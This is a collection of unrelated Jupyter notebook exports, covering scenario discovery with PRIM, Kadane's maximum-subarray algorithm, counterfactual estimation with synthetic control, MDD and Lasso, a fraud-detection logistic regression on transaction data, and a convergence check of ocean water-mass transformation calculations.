#import numpy.lib.recfunctions as rf
from ema_workbench.analysis import feature_scoring
import seaborn as sns
#results_update = results.where((pd.notnull(results)),'none')
#experiments = rf.drop_fields(experiments, ['policy'], asrecarray=True)
x = experiments
y = outcomes
# focus dataset on 1 climate scenario
#x_bool = x[x_bool==1]
#y_new = y[x_bool==1]
fs = feature_scoring.get_feature_scores_all(x, y)
sns.heatmap(fs, cmap='viridis', annot=True)
pyplot.show()
from ema_workbench.analysis import prim
b1= outcomes['risk_reduction'] > 0.40
b2= outcomes['construction_costs'] < 125
b3= outcomes['affected_pop_reduction'] > 0.65
b4= x['climate_scenario'] == 'low'
y = b1 & b2 & b3 & b4
prim_alg = prim.Prim(x,y, threshold=0.7)
box1 = prim_alg.find_box()
box1.show_tradeoff()
pyplot.show()
box1.show_pairs_scatter()
pyplot.show()
###Output
climate_scenario ['low', 'high']
CD_1 [False, True]
policy [0, 1, 2, 3, 5, 6, 7, 8, 10, 11, 12, 13, 14, 15, 17, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 31, 32, 33, 34, 35, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 66, 67, 69, 70, 71, 72, 73, 75, 76, 77, 78, 79, 80, 81, 82, 83, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 98, 99, 100, 101, 102, 103, 105, 107, 109, 110, 111, 112, 113, 114, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 130, 131, 132, 134, 135, 137, 138, 139, 141, 142, 143, 144, 145, 146, 147, 149, 152, 153, 154, 155, 156, 157, 158, 159, 161, 162, 163, 164, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 179, 180, 181, 182, 183, 184, 185, 186, 187, 189, 190, 191, 192, 193, 194, 195, 196, 197, 200, 201, 202, 203, 204, 205, 206, 208, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 222, 223, 224, 225, 226, 227, 228, 229, 231, 233, 235, 236, 239, 240, 241, 245, 246, 247, 248, 251, 252, 253, 254, 255, 256, 257, 258, 260, 261, 263, 266, 267, 268, 269, 271, 272, 273, 274, 277, 278, 279, 280, 281, 282, 284, 285, 286, 289, 292, 293, 295, 296, 297, 298, 299, 303, 304, 305, 306, 307, 308, 310, 311, 312, 314, 315, 316, 317, 318, 319, 320, 321, 322, 324, 325, 326, 327, 328, 329, 330, 331, 332, 333, 335, 337, 338, 339, 340, 341, 342, 344, 345, 346, 349, 350, 351, 353, 354, 355, 356, 357, 358, 359, 360, 361, 362, 363, 365, 366, 367, 368, 369, 370, 371, 372, 375, 376, 377, 378, 379, 380, 381, 382, 383, 384, 386, 387, 388, 389, 391, 392, 394, 395, 397, 399, 400, 404, 405, 406, 408, 409, 410, 412, 413, 416, 417, 418, 419, 421, 422, 423, 424, 425, 426, 427, 428, 430, 431, 434, 435, 436, 437, 438, 439, 442, 443, 444, 446, 447, 448, 449, 450, 451, 452, 453, 454, 455, 456, 457, 458, 459, 460, 461, 462, 463, 465, 466, 467, 468, 469, 470, 471, 472, 473, 474, 475, 478, 479, 480, 481, 482, 483, 484, 485, 486, 488, 489, 490, 491, 492, 494, 495, 496, 497, 498, 499, 4, 9, 16, 18, 30, 36, 47, 65, 68, 74, 84, 95, 96, 97, 104, 106, 108, 115, 116, 128, 129, 133, 136, 140, 148, 150, 151, 160, 165, 178, 188, 198, 199, 207, 209, 221, 230, 232, 234, 237, 238, 242, 243, 244, 249, 250, 259, 262, 264, 265, 270, 275, 276, 283, 287, 288, 290, 291, 294, 300, 301, 302, 309, 313, 323, 334, 336, 343, 347, 348, 352, 364, 373, 374, 385, 390, 393, 396, 398, 401, 402, 403, 407, 411, 414, 415, 420, 429, 432, 433, 440, 441, 445, 464, 476, 477, 487, 493]
|
_notebooks/2021-02-19-max-subarray-kadane-algo.ipynb | ###Markdown
Find maximum sum subarray> Given an array, find the contiguous subarray that has the maximum sum- toc: false- badges: true- comments: true- categories: [array, dynamic programming] ProblemGiven an array, find a subarray (contiguous elements in the array) that has the maximum sum. Example:```Input: [-2, 1, -3, 4, -1, 2, 1, -5, 4]Output: 6The sum of subarray [4, -1, 2, 1] is 6, which is the maximum over all possible subarrays``` SolutionKadane's algorithm {% cite wiki_kadane %} scans the given array and maintains the maximum sum of a subarray ending at each index.
###Code
def max_sum_subarray(nums):
# stores the maximum sum sublist found so far
max_so_far = nums[0]
# stores the maximum sum of sublist ending at the current position
max_ending_here = nums[0]
# traverse the given list
for num in nums[1:]:
# update the maximum sum of sublist "ending" at index `i`
max_ending_here = max_ending_here + num
# maximum sum should be more than the current element
max_ending_here = max(max_ending_here, num)
# update the result if the current sublist sum is found to be greater
max_so_far = max(max_so_far, max_ending_here)
return max_so_far
#collapse-hide
nums = [-2, -1, -3, -4, -1, -2, -1, -5, -4]
print(f"Max sum subarray of {nums} = {max_sum_subarray(nums)}")
nums = [-2, 1, -3, 4, -1, 2, 1, -5, 4]
print(f"Max sum subarray of {nums} = {max_sum_subarray(nums)}")
###Output
Max sum subarray of [-2, -1, -3, -4, -1, -2, -1, -5, -4] = -1
Max sum subarray of [-2, 1, -3, 4, -1, 2, 1, -5, 4] = 6
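###Markdown
For reference, the sketch below is a small variant of the same scan that also records where the best subarray starts and ends; it is an added illustration, not part of the original solution.
###Code
def max_sum_subarray_with_indices(nums):
    # same Kadane scan as above, but with bookkeeping for the subarray boundaries
    best_sum = curr_sum = nums[0]
    best_start = best_end = curr_start = 0
    for i, num in enumerate(nums[1:], start=1):
        if curr_sum + num < num:
            # restarting a new sublist at `num` beats extending the current one
            curr_sum = num
            curr_start = i
        else:
            curr_sum += num
        if curr_sum > best_sum:
            # remember the best window seen so far
            best_sum = curr_sum
            best_start, best_end = curr_start, i
    return best_sum, best_start, best_end

# e.g. max_sum_subarray_with_indices([-2, 1, -3, 4, -1, 2, 1, -5, 4]) returns (6, 3, 6),
# i.e. the subarray nums[3:7] == [4, -1, 2, 1]
###Output
_____no_output_____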
|
03 Estimate counterfactual outcomes for each base learner.ipynb | ###Markdown
Import Modules
###Code
import numpy as np
import pandas as pd
import json
import scipy
from scipy.spatial.distance import mahalanobis
import scipy.optimize as optimize
from sklearn.linear_model import ElasticNetCV, Lasso
from base_learners.data_loading import load_data, load_from_folder
from visualization.counterfactual_plot import plot_df
from base_learners.base_analysis import get_ate, report_ate, count_coefs, tradeoff
###Output
_____no_output_____
###Markdown
Check the current scenario and $T_0$
###Code
with open('src/senario_selection.json', 'r') as f:
json_selection = json.load(f)
senario = json_selection['senario']
T0 = json_selection['T0']
print('We are currently in scenario', senario, f'with T0 = {T0}')
###Output
We are currently in scenario D with T0 = 24
###Markdown
Load data
###Code
control_data, treat_data, untreat_data = load_data(senario)
###Output
_____no_output_____
###Markdown
Parameters
###Code
T = control_data[0].shape[1] # Total periods
sample_size = len(control_data) # How many times we draw data
control_units = control_data[0].shape[0] # How many control units we have
###Output
_____no_output_____
###Markdown
Prepare for MDD method: matching and optimization
###Code
# Matching Difference-in-Difference (MDD): Matching.
# Minimizing the Mahalonobis distance between the treaded and
# each control unit in the pretreatment period.
distances = np.zeros((sample_size, control_units))
for i in np.arange(sample_size):
for j in np.arange(control_units):
control_unit = control_data[i].values[j][:T0].reshape(1, -1)
treat_unit = treat_data[i].values[:T0].reshape(1,-1)
# Calculate the inverse of covariance matrix of two vectors.
df_comb = pd.DataFrame(np.concatenate((control_unit, treat_unit)))
cov = df_comb.cov()
try:
vi = scipy.linalg.inv(cov)
# Calculate the Mahalonobis distanec.
md = mahalanobis(control_unit.reshape(-1,), treat_unit.reshape(-1,), vi)
distances[i, j] = md
except:
print('Singular cov matrix occurs in (dataset, control unit):', (i+1, j))
idx_md_sort = np.argsort(distances, axis=1)
idx_five = idx_md_sort[:, :5]
def func_loss(params):
"""
Used in the loop!
"""
w, alpha = params
treat = treat_data[i].values[:T0].reshape(-1,)
return np.sum((treat - w * np.sum(control_select.T, axis=1) - alpha * np.ones((T0,))) ** 2)
# MDD: optimazation
# For each iteration, pick up the control unit according to the previous selection.
results = []
initial_guess = [0.2, 1]
for i in np.arange(sample_size):
control_unit = control_data[i].values[:, :T0]
idx_select = idx_five[i,:]
control_select = control_unit[idx_select,:]
# Optimization
result = optimize.minimize(func_loss, initial_guess)
results.append(result)
###Output
_____no_output_____
###Markdown
Get counterfactual predictions for all methods
###Code
# Sum-to-one constraint.
magnitude = 1e5
add = np.ones((control_units, 1)).T * magnitude
# For selecting penalty term using cv: by default we use 5-KFold.
# If there are not enough periods for cv, then use leave-one-out.
if T0 < 5:
kf = T0
else:
kf=5
counterfactuals_syn = []
coefs_syn = []
counterfactuals_mdd = []
coefs_mdd = []
counterfactuals_lasso = []
coefs_lasso = []
for i in np.arange(sample_size):
X = control_data[i].values[:, :T0].T
y = treat_data[i].values.reshape(-1,)[:T0]
X_predict = control_data[i].values[:, T0:].T
X_restr = np.concatenate((X, add), axis=0)
y_restr = np.append(y, magnitude)
# Synthetic Method
print('{}th iteration: Synthetic Method'.format(i+1))
regr_syn = Lasso(alpha=0, max_iter=5000, positive=True)
regr_syn.fit(X_restr, y_restr)
y_hat_syn = regr_syn.predict(X_predict)
counterfactuals_syn.append(y_hat_syn)
coefs_syn.append(regr_syn.coef_)
# MDD Method
print('{}th iteration: MDD Method'.format(i+1))
y_hat_mdd = results[i].x[0] * np.sum(X_predict[:, idx_five[i]], axis=1) + results[i].x[1]
counterfactuals_mdd.append(y_hat_mdd)
coefs_mdd.append(np.array([results[i].x[0]] * 5))
# Lasso
print('{}th iteration: Lasso'.format(i+1))
regr = ElasticNetCV(l1_ratio=1, cv=kf, max_iter=5000)
regr.fit(X, y)
y_hat_lasso = regr.predict(X_predict)
counterfactuals_lasso.append(y_hat_lasso)
coefs_lasso.append(regr.coef_)
# Directly import the imputed data, which has been computed in 02 notebook.
path_mc = 'base_learners/mc_counterfactual/'
mc_imputed = load_from_folder(path_mc)
# Extract the last ten elements from the last row:
# this is the values we estimated.
counterfactuals_mc = []
for i in np.arange(len(mc_imputed)):
mc_est = mc_imputed[i].values[-1, T0:]
counterfactuals_mc.append(mc_est)
###Output
1th iteration: Synthetic Method
1th iteration: MDD Method
1th iteration: Lasso
2th iteration: Synthetic Method
2th iteration: MDD Method
2th iteration: Lasso
###Markdown
Analysis
###Code
plot_df(control_data[40], f'Senario {senario}: SC', treat_data[40], counterfactuals_syn[40], save_fig=True, case='SC')
ate_hat_syn, ate_syn = get_ate(counterfactuals_syn, control_data, treat_data, untreat_data, T0)
number_control_syn = count_coefs(coefs_syn)
report_ate(ate_hat_syn, number_control_syn)
tradeoff(ate_hat_syn, ate_syn, sample_size)
plot_df(control_data[40], f'Senario {senario}: MDD', treat_data[40], counterfactuals_mdd[40], save_fig=True, case='MDD')
ate_hat_mdd, ate_mdd = get_ate(counterfactuals_mdd, control_data, treat_data, untreat_data, T0)
number_control_mdd = count_coefs(coefs_mdd)
report_ate(ate_hat_mdd, number_control_mdd)
tradeoff(ate_hat_mdd, ate_mdd, sample_size)
plot_df(control_data[40], f'Senario {senario}: Lasso', treat_data[40], counterfactuals_lasso[40], save_fig=True, case='Lasso')
ate_hat_lasso, ate_lasso = get_ate(counterfactuals_lasso, control_data, treat_data, untreat_data, T0)
number_control_lasso = count_coefs(coefs_lasso)
report_ate(ate_hat_lasso, number_control_lasso)
tradeoff(ate_hat_lasso, ate_lasso, sample_size)
plot_df(control_data[40], f'Senario {senario}: MC', treat_data[40], counterfactuals_mc[40], save_fig=True, case='MC')
ate_hat_mc, ate_mc = get_ate(counterfactuals_mc, control_data, treat_data, untreat_data, T0)
report_ate(ate_hat_mc, control_idx_list=None)
tradeoff(ate_hat_mc, ate_mc, sample_size)
###Output
Bias^2:
[0.00242623 0.03881547 0.00042577 0.03023326 0.00017013 0.02343535]
Variance:
[1.34789563 2.0108772 1.98753039 2.24865216 2.22820708 1.78984223]
Bias^2 + Variance:
[1.35032186 2.04969267 1.98795616 2.27888542 2.2283772 1.81327758]
MSE for verification:
[1.35032186 2.04969267 1.98795616 2.27888542 2.2283772 1.81327758]
###Markdown
Store some variables for usage in notebook 05 and 06
###Code
%%capture
%store T
%store senario
%store T0
%store add
%store kf
%store control_units
%store sample_size
%store control_data
%store treat_data
%store untreat_data
%store initial_guess
%store magnitude
%store counterfactuals_syn
%store counterfactuals_mdd
%store counterfactuals_lasso
%store counterfactuals_mc
%store ate_hat_syn
%store ate_syn
%store ate_hat_lasso
%store ate_lasso
%store ate_hat_mdd
%store ate_mdd
%store ate_hat_mc
%store ate_mc
###Output
_____no_output_____ |
fraud_detection/fraud_detection.ipynb | ###Markdown
Fraud detectionUsing logistic regression to predict fraud. Parameters
###Code
DATA = './input/ieee-fraud-detection.zip'
###Output
_____no_output_____
###Markdown
Data 1. Imports
###Code
# System
from zipfile import ZipFile
import os
# Data manipulation and analysis
import pandas as pd
from pandas.plotting import register_matplotlib_converters
register_matplotlib_converters()
# Visualization
import matplotlib.pyplot as plt
%matplotlib inline
import seaborn as sns
sns.set()
###Output
_____no_output_____
###Markdown
2. Loading
###Code
dfs = {}
with ZipFile(DATA) as zip:
for data in zip.infolist():
print('> Processing :', data.filename, end='')
filename = os.path.splitext(data.filename)[0]
dfs[filename] = pd.read_csv(zip.open(data.filename))
print(' - done!')
dfs.keys()
###Output
_____no_output_____
###Markdown
3. Exploration
###Code
dfs['train_identity'].head()
dfs['train_transaction'].head()
dfs['train_identity'].shape
dfs['train_transaction'].shape
df_train = pd.merge(dfs['train_transaction'], dfs['train_identity'], on='TransactionID', how='left')
df_train.shape
df_train.head()
print(df_train.columns.tolist())
###Output
['TransactionID', 'isFraud', 'TransactionDT', 'TransactionAmt', 'ProductCD', 'card1', 'card2', 'card3', 'card4', 'card5', 'card6', 'addr1', 'addr2', 'dist1', 'dist2', 'P_emaildomain', 'R_emaildomain', 'C1', 'C2', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'C9', 'C10', 'C11', 'C12', 'C13', 'C14', 'D1', 'D2', 'D3', 'D4', 'D5', 'D6', 'D7', 'D8', 'D9', 'D10', 'D11', 'D12', 'D13', 'D14', 'D15', 'M1', 'M2', 'M3', 'M4', 'M5', 'M6', 'M7', 'M8', 'M9', 'V1', 'V2', 'V3', 'V4', 'V5', 'V6', 'V7', 'V8', 'V9', 'V10', 'V11', 'V12', 'V13', 'V14', 'V15', 'V16', 'V17', 'V18', 'V19', 'V20', 'V21', 'V22', 'V23', 'V24', 'V25', 'V26', 'V27', 'V28', 'V29', 'V30', 'V31', 'V32', 'V33', 'V34', 'V35', 'V36', 'V37', 'V38', 'V39', 'V40', 'V41', 'V42', 'V43', 'V44', 'V45', 'V46', 'V47', 'V48', 'V49', 'V50', 'V51', 'V52', 'V53', 'V54', 'V55', 'V56', 'V57', 'V58', 'V59', 'V60', 'V61', 'V62', 'V63', 'V64', 'V65', 'V66', 'V67', 'V68', 'V69', 'V70', 'V71', 'V72', 'V73', 'V74', 'V75', 'V76', 'V77', 'V78', 'V79', 'V80', 'V81', 'V82', 'V83', 'V84', 'V85', 'V86', 'V87', 'V88', 'V89', 'V90', 'V91', 'V92', 'V93', 'V94', 'V95', 'V96', 'V97', 'V98', 'V99', 'V100', 'V101', 'V102', 'V103', 'V104', 'V105', 'V106', 'V107', 'V108', 'V109', 'V110', 'V111', 'V112', 'V113', 'V114', 'V115', 'V116', 'V117', 'V118', 'V119', 'V120', 'V121', 'V122', 'V123', 'V124', 'V125', 'V126', 'V127', 'V128', 'V129', 'V130', 'V131', 'V132', 'V133', 'V134', 'V135', 'V136', 'V137', 'V138', 'V139', 'V140', 'V141', 'V142', 'V143', 'V144', 'V145', 'V146', 'V147', 'V148', 'V149', 'V150', 'V151', 'V152', 'V153', 'V154', 'V155', 'V156', 'V157', 'V158', 'V159', 'V160', 'V161', 'V162', 'V163', 'V164', 'V165', 'V166', 'V167', 'V168', 'V169', 'V170', 'V171', 'V172', 'V173', 'V174', 'V175', 'V176', 'V177', 'V178', 'V179', 'V180', 'V181', 'V182', 'V183', 'V184', 'V185', 'V186', 'V187', 'V188', 'V189', 'V190', 'V191', 'V192', 'V193', 'V194', 'V195', 'V196', 'V197', 'V198', 'V199', 'V200', 'V201', 'V202', 'V203', 'V204', 'V205', 'V206', 'V207', 'V208', 'V209', 'V210', 'V211', 'V212', 'V213', 'V214', 'V215', 'V216', 'V217', 'V218', 'V219', 'V220', 'V221', 'V222', 'V223', 'V224', 'V225', 'V226', 'V227', 'V228', 'V229', 'V230', 'V231', 'V232', 'V233', 'V234', 'V235', 'V236', 'V237', 'V238', 'V239', 'V240', 'V241', 'V242', 'V243', 'V244', 'V245', 'V246', 'V247', 'V248', 'V249', 'V250', 'V251', 'V252', 'V253', 'V254', 'V255', 'V256', 'V257', 'V258', 'V259', 'V260', 'V261', 'V262', 'V263', 'V264', 'V265', 'V266', 'V267', 'V268', 'V269', 'V270', 'V271', 'V272', 'V273', 'V274', 'V275', 'V276', 'V277', 'V278', 'V279', 'V280', 'V281', 'V282', 'V283', 'V284', 'V285', 'V286', 'V287', 'V288', 'V289', 'V290', 'V291', 'V292', 'V293', 'V294', 'V295', 'V296', 'V297', 'V298', 'V299', 'V300', 'V301', 'V302', 'V303', 'V304', 'V305', 'V306', 'V307', 'V308', 'V309', 'V310', 'V311', 'V312', 'V313', 'V314', 'V315', 'V316', 'V317', 'V318', 'V319', 'V320', 'V321', 'V322', 'V323', 'V324', 'V325', 'V326', 'V327', 'V328', 'V329', 'V330', 'V331', 'V332', 'V333', 'V334', 'V335', 'V336', 'V337', 'V338', 'V339', 'id_01', 'id_02', 'id_03', 'id_04', 'id_05', 'id_06', 'id_07', 'id_08', 'id_09', 'id_10', 'id_11', 'id_12', 'id_13', 'id_14', 'id_15', 'id_16', 'id_17', 'id_18', 'id_19', 'id_20', 'id_21', 'id_22', 'id_23', 'id_24', 'id_25', 'id_26', 'id_27', 'id_28', 'id_29', 'id_30', 'id_31', 'id_32', 'id_33', 'id_34', 'id_35', 'id_36', 'id_37', 'id_38', 'DeviceType', 'DeviceInfo']
###Markdown
Visualizing missing data
###Code
missing_data_columns = df_train.isnull().sum().sort_values(ascending=False);
missing_data_percentage = missing_data_columns / len(df_train) * 100;
plt.figure(figsize=(80,10))
sns.barplot(x=missing_data_columns.index, y=missing_data_percentage)
plt.title('Missing data')
plt.xlabel('Columns')
plt.ylabel('Percentage (%)')
plt.xticks(rotation=90)
plt.show()
###Output
_____no_output_____
###Markdown
4. Preparation a. Remove all columns with more than 75% missing data
###Code
missing_data_percentage = df_train.isnull().sum() / len(df_train) * 100
missing_data_percentage > 75
missing_data_percentage[missing_data_percentage > 75]
df_train_step_1_clean = df_train[missing_data_percentage[missing_data_percentage < 75].index]
df_train.shape
df_train_step_1_clean.shape
df_train_step_1_clean.head()
df_train = df_train_step_1_clean
###Output
_____no_output_____
###Markdown
b. Convert categorical variables into dummy/indicator variables
###Code
df_train_objects = df_train[df_train.select_dtypes(include=['object']).columns]
df_train_objects
dummy1 = pd.get_dummies(df_train_objects['P_emaildomain'])
dummy1.head()
dummy2 = pd.get_dummies(df_train_objects['card4'])
dummy2.head()
df_train_converted_objects = pd.get_dummies(df_train_objects)
df_train_converted_objects.head()
df_train_converted_objects.shape
df_train_step_2_clean = df_train.drop(df_train_objects, axis=1)
df_train_step_2_clean.head()
df_train_step_2_clean = pd.concat([df_train_step_2_clean, df_train_converted_objects], axis=1)
df_train_step_2_clean.head()
df_train_step_2_clean.shape
df_train = df_train_step_2_clean
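# (Added note) get_dummies was applied to the training frame only; if a separate test frame were
# encoded the same way, its dummy columns should be aligned to the training columns before modeling,
# e.g. (hypothetical df_test_dummies):
#     df_test_dummies.reindex(columns=df_train_converted_objects.columns, fill_value=0)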
###Output
_____no_output_____
###Markdown
c. Replace missing data (NaN)
###Code
missing_data_set = df_train.isnull().sum().sort_values(ascending=False)
plt.figure(figsize=(80,10))
sns.barplot(x=missing_data_set.index,
y=missing_data_set / len(df_train) * 100)
plt.title('Missing data')
plt.xlabel('Columns')
plt.ylabel('Percentage (%)')
plt.xticks(rotation=90)
plt.show()
missing_data_set[missing_data_set > 0]
df_train['dist1'].isnull().sum()
df_train['dist1'].mean()
df_train['dist1'].median()
df_train['dist1'].mode()
df_train['V291']
for column in missing_data_set[missing_data_set > 0].index:
print('>', column)
print(df_train[column].isnull().sum(), df_train[column].mean(), df_train[column].median(), df_train[column].mode())
# Arbitrarily choose to replace the missing value with the median. Don't want to add new values with the mean.
df_train[column].fillna(df_train[column].median(), inplace=True)
df_train.isnull().values.any()
###Output
_____no_output_____
###Markdown
Modeling
###Code
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
x_full_df = df_train.drop(["isFraud"], axis=1)
y_full_df = df_train["isFraud"]
X_train, X_test, y_train, y_test = train_test_split(x_full_df, y_full_df, test_size=0.30)
lr = LogisticRegression(solver='lbfgs', max_iter=1000)
lr.fit(X_train, y_train)
lr.score(X_test, y_test)
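# (Added sketch) isFraud is highly imbalanced, so plain accuracy (the score above) can look good
# even for a trivial classifier; a threshold-free metric such as ROC AUC is a useful complement.
from sklearn.metrics import roc_auc_score
roc_auc = roc_auc_score(y_test, lr.predict_proba(X_test)[:, 1])
roc_auc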
###Output
_____no_output_____ |
notebooks/draw_wmt-convergence_box.ipynb | ###Markdown
Convergence of WMT calculation at small dl. Example in a box initialized with linear stratification and subject to vertical diffusion.
###Code
import xarray as xr
import numpy as np
from matplotlib import pyplot as plt
from xarrayutils import vertical_coordinates as vc
## LOAD DATA
vgrid = 'native'
averaging = '6h'
# Time-mean tendencies
rootdir = '/archive/gam/MOM6-gm/ocean_only/box/dev_core/'+averaging+'/'
filename = 'ocean_'+vgrid+'.nc'
ds = xr.open_dataset(rootdir+filename)
# Time steps
delta_t = ds['average_DT'].astype('timedelta64[s]')
# Grid
filename_grid = 'ocean_static.nc'
grid = xr.open_dataset(rootdir+filename_grid)
# Constants
cp = 3992.0
rho0 = 1035.0
# Snapshots
filename_snap = 'ocean_'+vgrid+'_snap.nc'
ds_snap = xr.open_dataset(rootdir+filename_snap)
###Output
/nbhome/gam/miniconda/envs/mom6-clean/lib/python3.8/site-packages/xarray/coding/times.py:426: SerializationWarning: Unable to decode time axis into full numpy.datetime64 objects, continuing using cftime.datetime objects instead, reason: dates out of range
dtype = _decode_cf_datetime_dtype(data, units, calendar, self.use_cftime)
###Markdown
Specify the depth of layers on the native grid. This is done for the time-mean fields and the snapshot fields.
###Code
### Time-mean properties
nt = len(ds['time'])
l = ds['temp'][{'time':slice(1,nt)}] # Scalar defining contours
h = ds['thkcello'][{'time':slice(1,nt)}] # Thickness
ps = (ds['opottempdiff'][{'time':slice(1,nt)}]/cp).to_dataset() # Diffusive processes changing l
# Get the depth of the layers on the native grid
z_i = xr.concat([xr.zeros_like(h.isel(zl=0)),h.cumsum(dim='zl')],dim='zl')
z_i = z_i.rename({'zl':'zi'})
z_i_vals = z_i.values
z_l_vals = 0.5*(z_i_vals[:,:,:,:-1]+z_i_vals[:,:,:,1:])
z_l = xr.DataArray(z_l_vals,dims=['time','yh','xh','zl'],coords={'time':l['time'],'xh':l['xh'],'yh':l['yh'],'zl':l['zl']})
### Snap-shots
l_snap = ds_snap['temp']
h_snap = ds_snap['thkcello']
# Get the depth of the layers on the native grid
z_snap_i = xr.concat([xr.zeros_like(h_snap.isel(zl=0)),h_snap.cumsum(dim='zl')],dim='zl')
z_snap_i = z_snap_i.rename({'zl':'zi'})
z_snap_i_vals = z_snap_i.values
z_snap_l_vals = 0.5*(z_snap_i_vals[:,:,:,:-1]+z_snap_i_vals[:,:,:,1:])
z_snap_l = xr.DataArray(z_snap_l_vals,dims=['time','yh','xh','zl'],coords={'time':z_snap_i.time,'xh':z_snap_i.xh,'yh':z_snap_i.yh,'zl':l['zl']})
###Output
_____no_output_____
###Markdown
Evaluate the residual of the WMT calculation for varying dl. This is done in a rather inefficient way, redoing the (time-consuming) interpolation for every new dl. However, it is done here for simplicity and consistency; more efficient approaches (e.g. interpolating once and then taking a subset of the contours) have their own inherent challenges.
###Code
### Wrapper function to do watermass transformation from linear interpolation onto l contours
def calc_wmt_linearinterp(l,ps,z_l,z_i,l_snap,z_snap_l,z_snap_i,delta_l,area,rho0=1035):
## Find the depths of l contours via linear interpolation
### High resolution in l
print('Calculating WMT with linear interpolation, delta_l = '+str(delta_l)+':')
l_i_vals = np.arange(-1,11,delta_l)
l_l_vals = 0.5*(l_i_vals[1:]+l_i_vals[:-1])
# Flip the order of the temperature bins
l_i = np.flip(l_i_vals)
l_i = xr.DataArray(l_i,coords={l.name+'_bin':l_i},dims=l.name+'_bin')
l_l = np.flip(l_l_vals)
l_l = xr.DataArray(l_l,coords={l.name+'_bin':l_l},dims=l.name+'_bin')
### Time-mean
print(' Finding depths of layer interfaces (time-mean fields)...')
l_i_depth = vc.linear_interpolation_regrid(z = z_l,
data = l,
target_values = l_i,
z_bounds = z_i,
target_value_dim = l.name+'_bin',
z_bounds_dim='zi',
z_dim='zl')
print(' Finding depths of l contours (snapshot fields)...')
l_snap_l_depth = vc.linear_interpolation_regrid(z = z_snap_l,
data = l_snap,
target_values = l_l,
z_bounds = z_snap_i,
target_value_dim = l.name+'_bin',
z_bounds_dim='zi',
z_dim='zl')
#### Calculation of E ####
### Remap properties to new l-contour grid
# Necessary only for the time-mean properties
# A little hacky to recover vertically integrated quantities (as opposed to layer mean quantities as is currently output by vc algorithm)
# 1. Convert tendency to pseudo-intensive quantity
# 2. Conservative remap
    # 3. Multiply by new layer thickness
print(' Remapping tendencies into l layers...')
ps_remap=xr.Dataset()
for term in ps.data_vars:
print(term)
dz_orig = z_i.diff('zi').rename({'zi':'zl'})
ps_intensive = ps[term]/dz_orig
ps_intensive_remapped = vc.conservative_remap(data=ps_intensive,z_bnds_source=z_i, z_bnds_target=l_i_depth,
z_dim='zl', z_bnd_dim='zi', z_bnd_dim_target='regridded', mask=True)
ps_intensive_remapped = ps_intensive_remapped.assign_coords(remapped=np.flip(l_l_vals))
dz_targ = l_i_depth.diff('regridded').rename({'regridded':'remapped'}).assign_coords(remapped=np.flip(l_l_vals))
ps_remap[term] = ps_intensive_remapped*dz_targ
ps_remap = ps_remap.rename({'remapped':l.name+'_bin'})
print(' Integrating tendencies within layers to get E...')
E = (ps_remap['opottempdiff']*grid.areacello).sum(['xh','yh'])/delta_l
#### Calculation of dVdt ####
print(' Calcualting dVdt from change in contour depth...')
# We can calculate the volume change in time from the change in interface depth
dVdt = (rho0*l_snap_l_depth*area).sum(['xh','yh']).diff('time')/(6*60*60)
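    # (Added note) the 6*60*60 s divisor is the snapshot interval in seconds, consistent with averaging = '6h' above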
dVdt = dVdt.rename({'regridded':l.name+'_bin'}).assign_coords(time=E['time'])
print(' Calculating residual...')
residual = dVdt-E
print('... done.')
return E,dVdt,residual
E = {}
dVdt = {}
residual = {}
dls = [1,0.5,0.25,0.1,0.05,0.01]
for delta_l in dls:
E[delta_l],dVdt[delta_l],residual[delta_l] = calc_wmt_linearinterp(l,ps,z_l,z_i,l_snap,z_snap_l,z_snap_i,delta_l,area=grid.areacello,rho0=rho0)
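# (Added sketch) One way to summarise convergence: the time- and bin-mean absolute residual for
# each delta_l, which should shrink as delta_l decreases.
mean_abs_residual = {dl: float(np.abs(residual[dl]).mean()) for dl in dls}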
###Output
Calculating WMT with linear interpolation, delta_l = 1:
Finding depths of layer interfaces (time-mean fields)...
Finding depths of l contours (snapshot fields)...
Remapping tendencies into l layers...
opottempdiff
Integrating tendencies within layers to get E...
Calcualting dVdt from change in contour depth...
Calculating residual...
... done.
Calculating WMT with linear interpolation, delta_l = 0.5:
Finding depths of layer interfaces (time-mean fields)...
Finding depths of l contours (snapshot fields)...
Remapping tendencies into l layers...
opottempdiff
Integrating tendencies within layers to get E...
Calcualting dVdt from change in contour depth...
Calculating residual...
... done.
Calculating WMT with linear interpolation, delta_l = 0.25:
Finding depths of layer interfaces (time-mean fields)...
Finding depths of l contours (snapshot fields)...
Remapping tendencies into l layers...
opottempdiff
Integrating tendencies within layers to get E...
Calcualting dVdt from change in contour depth...
Calculating residual...
... done.
Calculating WMT with linear interpolation, delta_l = 0.1:
Finding depths of layer interfaces (time-mean fields)...
Finding depths of l contours (snapshot fields)...
Remapping tendencies into l layers...
opottempdiff
Integrating tendencies within layers to get E...
Calcualting dVdt from change in contour depth...
Calculating residual...
... done.
Calculating WMT with linear interpolation, delta_l = 0.05:
Finding depths of layer interfaces (time-mean fields)...
Finding depths of l contours (snapshot fields)...
Remapping tendencies into l layers...
opottempdiff
Integrating tendencies within layers to get E...
Calcualting dVdt from change in contour depth...
Calculating residual...
... done.
Calculating WMT with linear interpolation, delta_l = 0.01:
Finding depths of layer interfaces (time-mean fields)...
Finding depths of l contours (snapshot fields)...
Remapping tendencies into l layers...
opottempdiff
Integrating tendencies within layers to get E...
Calcualting dVdt from change in contour depth...
Calculating residual...
... done.
###Markdown
Figures
###Code
ndl = len(dls)
vmin=-3E7
vmax=3E7
fig,ax = plt.subplots(figsize = (5*3,5*ndl),nrows=ndl,ncols=3)
count=0
for delta_l in dls:
im = ax[count,0].pcolormesh(dVdt[delta_l],cmap='RdBu_r',vmin=vmin,vmax=vmax)
plt.colorbar(im,ax=ax[count,0])
im = ax[count,1].pcolormesh(E[delta_l],cmap='RdBu_r',vmin=vmin,vmax=vmax)
plt.colorbar(im,ax=ax[count,1])
im = ax[count,2].pcolormesh(residual[delta_l],cmap='RdBu_r',vmin=vmin,vmax=vmax)
plt.colorbar(im,ax=ax[count,2])
count+=1
nt = len(residual[0.5]['time'])
ndl = len(dls)
